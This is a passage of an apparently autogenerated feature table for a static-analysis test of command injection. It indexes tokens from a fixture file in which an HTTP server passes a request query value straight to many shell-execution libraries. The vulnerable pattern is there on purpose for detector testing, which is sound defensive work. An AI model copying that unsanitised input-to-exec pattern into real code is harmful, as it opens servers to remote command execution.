autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | exceptional return of require("http") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | require("http") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | require("http") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | require("http") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:20:1:25 | "http" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:7 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:7 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url = require("url") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url = require("url") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:5:2:24 | url = require("url") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:17 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:17 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | exceptional return of require("url") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | exceptional return of require("url") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | exceptional return of require("url") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | require("url") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | require("url") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | require("url") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:19:2:23 | "url" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:4:10 | server | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:4:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:4:10 | server | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:35:2 | server ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:35:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:5:35:2 | server ... T OK\\n}) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:17 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:17 | http | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:30 | http.createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:4:30 | http.createServer | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | http.cr ... T OK\\n}) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:19:4:30 | createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:19:4:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:19:4:30 | createServer | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | this | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | this | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:4:31 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | 'arguments' object of anonymous function | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | exceptional return of anonymous function | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:32:35:1 | return of anonymous function | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:42:4:44 | req | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:47:4:49 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:47:4:49 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:47:4:49 | res | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:47:4:49 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:47:4:49 | res | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:11 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:11 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:11 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:11 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:11 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd = u ... ry.path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd = u ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd = u ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd = u ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:9:5:49 | cmd = u ... ry.path | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:17 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:17 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:17 | url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:17 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:17 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:23 | url.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:23 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:23 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:23 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:23 | url.parse | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | exceptional return of url.par ... , true) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:44 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:44 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| 